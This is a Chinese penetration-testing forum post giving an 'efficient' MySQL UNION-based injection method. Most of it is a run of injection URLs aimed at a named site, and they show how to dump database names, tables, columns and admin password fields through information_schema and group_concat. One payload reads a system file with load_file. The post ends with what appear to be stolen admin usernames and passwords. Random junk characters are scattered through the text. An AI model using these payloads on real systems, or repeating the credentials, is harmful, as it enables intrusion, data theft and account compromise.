找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql注入高效方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2162|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
( Y! |3 w6 k' x0 m! u* J+ E但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
; T) n! i) R5 V# j' }1 r& @
( O, W3 d6 j. J( L4 C' g: [8 G4 P* q8 ?% a* a. y! g, W
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
/ b, M+ L) z, I3 e
$ g* h5 O) @5 s缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...: ~4 A4 O2 ~; W4 i- _: F3 p/ y0 ^
* @9 ?& E! K1 G7 m) b) _$ I$ o
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示: f; }6 Y" I2 U, d; W$ n7 m
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等3 Y- B! o9 H% Y, e) m

6 ~: |7 E& }+ Q5 Ehttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17% Q' r  U" @1 R+ u* X

1 [: n- Y5 g, O- Z; N& T读出所有库:
+ ~$ u- m0 z% i! Fhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
' l$ z  [+ F  E0 z% b% V- g6 X) u. d7 Q2 R% ]' K2 ^$ G

& k5 N; J- g9 A* R6 V8 d( j; R& E7 O2 C
读出所有表:
8 |. a& w0 I9 g& R- Xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
8 x' ^$ z: m, d+ r& Y- X# Y# Z5 R2 v" ^
读出所有表字段:/ H+ ~6 X/ t6 J: i5 _5 E6 D+ |% |
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
* j' r' m2 K7 ?' s# r*/ (97,100,109,105,110)为admin的ascii码 依次类推- b- r( }2 i" G6 ~7 k; ~4 t( l; O
5 M' j# J' i9 P" k. }
读出所有表字段里的内容:
! @' @; Q9 F5 u$ o1 G& ~  ^http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
7 t! l9 A- I9 B2 v% v1 I
  t1 ?0 f9 N2 R: g3 m5 k9 B6 I2 h
7 z) h; u, |9 Q: y" z" f
2 i& L+ |7 u7 s) D" x& ~3 z6 e+ w- j9 a
$ ~8 g4 e8 ^" ?( l1 ]; J
! c) G- e3 f( X+ G, @+ P4 Q
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
; d$ M/ D: u# u! F% O
: j) c7 i9 W) n9 c& r* j6 s6 S5 v  B0 n6 s( M" ?+ Q6 d
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
+ W4 j8 @8 i4 a9 l/ |/ B
/ G: v8 b7 \4 ], Q. A* W. ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23' j! g* y+ m8 c2 y& U4 N( ^

& Z6 M5 J. r& C; R0 n# {3 ]- T3 I' A+ h3 z& l
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
8 }0 K3 S( d: M, ~! j. P, v6 |# U" i8 N& Z  _- h- Q) L" @' k
' _! R( Z# X1 ^2 C1 `' a
        webmaster:dzb521123,simlab:simadmin20043233% t0 j0 A& s( O3 N: ]0 k1 B! R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表